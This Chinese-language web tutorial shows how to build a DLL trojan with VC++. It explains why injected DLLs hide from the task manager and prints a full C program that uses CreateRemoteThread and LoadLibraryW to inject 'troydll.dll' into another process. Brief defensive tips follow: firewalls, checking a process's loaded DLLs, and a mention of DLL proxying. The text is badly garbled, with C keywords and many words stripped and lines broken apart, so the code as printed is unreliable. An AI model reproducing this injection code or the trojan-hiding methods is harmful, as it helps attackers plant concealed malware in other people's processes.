vc动态链接库编程:使用VC++动态链接库编程制作DLL木马疯狂代码！

DLL在

编制中可作出巨大贡献

它提供了具共性代码

复用能力

但是

正如

门高深

武学

若被掌握在正义的侠

手上

便可助其仗义江湖；但若被掌握在邪恶的徒

手上

则必然在江湖上掀起腥风血雨

DLL正是

种这样

武学

DLL

旦染上了魔性

就不再是正常

DLL

而是DLL木马

种恶贯满盈

病毒

令特洛伊

夜的间国破家亡

　　DLL木马

原理

　　DLL木马

实现原理是编程者在DLL中包含木马

代码

随后在目标主机中选择特定目标进程

以某种方式强行指定该进程

包含木马

DLL

最终达到侵袭目标系统

目

　　正是DLL

自身

特点决定了以这种形式加载木马不仅可行

而且具有良好

隐藏性:

　　(1)DLL

被映射到宿主进程

地址空间中

它能够共享宿主进程

资源

并根据宿主进程在目标主机

级别非法访问相应

系统资源；

　　(2)DLL

没有独立

进程地址空间

从而可以避免在目标主机中留下\"蛛丝马迹\"

达到隐蔽自身

目

　　DLL木马实现了\"真隐藏\"

我们在任务管理器中看不到木马\"进程\"

它完全溶进了系统

内核

和\"真隐藏\"对应

是\"假隐藏\"

\"假隐藏\"木马把自己注册成为

个服务

虽然在任务管理器中也看不到这个进程

但是\"假隐藏\"木马本质上还具备独立

进程空间

\"假隐藏\"只适用于Windows9x

系统

对于基于WINNT

操作系统

通过服务管理器

我们可以发现系统中注册过

服务

　　DLL木马注入其它进程

思路方法为远程线程插入

　　远程线程插入技术指

是通过在另

个进程中创建远程线程

思路方法进入那个进程

内存地址空间

将木马

以DLL

形式实现后

需要使用插入到目标进程中

远程线程将该木马DLL插入到目标进程

地址空间

即利用该线程通过

WindowsAPILoadLibrary

来加载木马DLL

从而实现木马对系统

侵害

　　DLL木马注入

　　这里涉及到

个非常重要

WindowsAPI――CreateRemoteThread

和的相比

我们所习惯使用

CreateThreadAPI

只能在进程自身内部产生

个新

线程

而且被创建

新线程和主线程共享地址空间和其他资源

而CreateRemoteThread则区别

它可以在另外

进程中产生线程！CreateRemoteThread有如下特点:

　　(1)CreateRemoteThread较CreateThread多

个参数hProcess

该参数用于指定要创建线程

远程进程

其

原型为:

HANDLECreateRemoteThread(
　HANDLEhProcess,//远程进程句柄
　LPSECURITY_ATTRIBUTESlpThreadAttributes,
　SIZE_TdwStackSize,
　LPTHREAD_START_ROUTINElpStartAddress,
　LPVOIDlpParameter,
　DWORDdwCreationFlags,
　LPDWORDlpThreadId
);

　　(2)线程

代码不能位于我们用来注入DLL木马

进程所在

地址空间中

也就是说

我们不能想当然地自己写

个

并把这个

作为远程线程

入口

；

　　(3)不能把本进程

指针作为CreateRemoteThread

参数

本进程

内存空间和远程进程

不

样

以下

由作者Shotgun

DLL木马注入

简化而得(单击此处下载

在经典书籍

Windows核心编程

中我们也可以看到类似

例子)

它将d盘根目录下

troydll.dll插入到ID为4000

进程中:

#

<windows.h>
#

<stdlib.h>
#

<stdio.h>

voidCheckError(

,char*);//出错处理

PDWORDpdwThreadId; [Page]
HANDLEhRemoteThread,hRemoteProcess;
DWORDfdwCreate,dwStackSize,dwRemoteProcessId;
PWSTRpszLibFileRemote=NULL;

void

(

argc,char**argv)
{
　

iReturnCode;
　charlpDllFullPathName[MAX_PATH];
　WCHARpszLibFileName[MAX_PATH]={0};

　dwRemoteProcessId=4000;
　strcpy(lpDllFullPathName,\"d:\\\\troydll.dll\");
　//将DLL文件全路径

ANSI码转换成UNICODE码
　iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,
　　lpDllFullPathName,strlen(lpDllFullPathName),
　　pszLibFileName,MAX_PATH);
　CheckError(iReturnCode,0,\"MultByteToWideChar\");
　//打开远程进程
　hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|//允许创建线程
　　PROCESS_VM_OPERATION|//允许VM操作
　　PROCESS_VM_WRITE,//允许VM写
　　FALSE,dwRemoteProcessId);
　CheckError((

)hRemoteProcess,NULL,\"RemoteProcessnotExistorAccessDenied!\");
　//计算DLL路径名需要

内存空间
　

cb=(1+lstrlenW(pszLibFileName))*

(WCHAR);
　pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
　CheckError((

)pszLibFileRemote,NULL,\"VirtualAllocEx\");
　//将DLL

路径名复制到远程进程

内存空间
　iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
　CheckError(iReturnCode,false,\"WriteProcessMemory\");
　//计算LoadLibraryW

入口地址
　PTHREAD_START_ROUTINEpfnStartAddr=(PTHREAD_START_ROUTINE)
　　　GetProcAddress(GetModuleHandle(TEXT(\"Kernel32\")),\"LoadLibraryW\");
　CheckError((

)pfnStartAddr,NULL,\"GetProcAddress\");
　//启动远程线程

通过远程线程

用户

DLL文件

　hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
　CheckError((

)hRemoteThread,NULL,\"CreateRemoteThread\");
　//等待远程线程退出
　WaitForSingleObject(hRemoteThread,INFINITE);
　//清场处理
　

(pszLibFileRemote!=NULL)
　{
　　VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
　}
　

(hRemoteThread!=NULL)
　{
　　CloseHandle(hRemoteThread); [Page]
　}
　

(hRemoteProcess!=NULL)
　{
　　CloseHandle(hRemoteProcess);
　}
}

//

处理

CheckError

voidCheckError(

iReturnCode,

iErrorCode,char*pErrorMsg)
{
　

(iReturnCode

iErrorCode)
　{
　　pr

f(\"%sError:%d\\n\\n\",pErrorMsg,GetLastError

);
　　//清场处理
　　

(pszLibFileRemote!=NULL)
　　{
　　　VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
　　}
　　

(hRemoteThread!=NULL)
　　{
　　　CloseHandle(hRemoteThread);
　　}
　　

(hRemoteProcess!=NULL)
　　{
　　　CloseHandle(hRemoteProcess);
　　}
　　exit(0);
　}
}

　　从DLL木马注入

源代码中我们可以分析出DLL木马注入

般步骤为:

　　(1)取得宿主进程(即要注入木马

进程)

进程IDdwRemoteProcessId；

　　(2)取得DLL

完全路径

并将其转换为宽

模式pszLibFileName；

　　(3)利用WindowsAPIOpenProcess打开宿主进程

应该开启下列选项:

　　a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程；

　　b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作；

　　c.PROCESS_VM_WRITE:允许对宿主进程进行VM写

　　(4)利用WindowsAPIVirtualAllocEx

在远程线程

VM中分配DLL完整路径宽

所需

存储空间

并利用WindowsAPIWriteProcessMemory

将完整路径写入该存储空间；

　　(5)利用WindowsAPIGetProcAddress取得Kernel32模块中LoadLibraryW

地址

这个

将作为随后将启动

远程线程

入口

；

　　(6)利用WindowsAPICreateRemoteThread启动远程线程

将LoadLibraryW

地址作为远程线程

入口

地址

将宿主进程里被分配空间中存储

完整DLL路径作为线程入口

参数以另其启动指定

DLL；

　　(7)清理现场

　　DLL木马

防治

　　从DLL木马

原理和

个简单

DLL木马

中我们学到了DLL木马

工作方式

这可以帮助我们更好地理解DLL木马病毒

防治手段

般

木马被植入后要打开

网络端口和攻击

通信

所以防火墙是抵御木马攻击

最好思路方法

防火墙可以进行数据包过滤检查

我们可以让防火墙对通讯端口进行限制

只允许系统接受几个特定端口

数据请求

这样

即使木马植入成功

攻击者也无法进入到受侵系统

防火墙把攻击者和木马分隔开来了

　　对于DLL木马

种简单

观察思路方法也许可以帮助用户发现的

我们查看运行进程所依赖

DLL

如果其中有

些莫名其妙

DLL

则可以断言这个进程是宿主进程

系统被植入了DLL木马

\"道高

尺

魔高

丈\"

现如今

DLL木马也发展到了更高

境界

它们看起来也不再\"莫名其妙\"

在最新

些木马里面

开始采用了先进

DLL陷阱技术

编程者用特洛伊DLL替换已知

系统DLL

特洛伊DLL对所有

进行过滤

对于正常

使用

转发器直接转发给被替换

系统DLL；对于

些事先约定好

特殊情况

DLL会执行

些相应

操作

vc动态链接库编程:使用VC++动态链接库编程制作DLL木马

延伸阅读

最新评论

发表评论

赞助商广告

随机更新

热门标注

最近更新

最新标注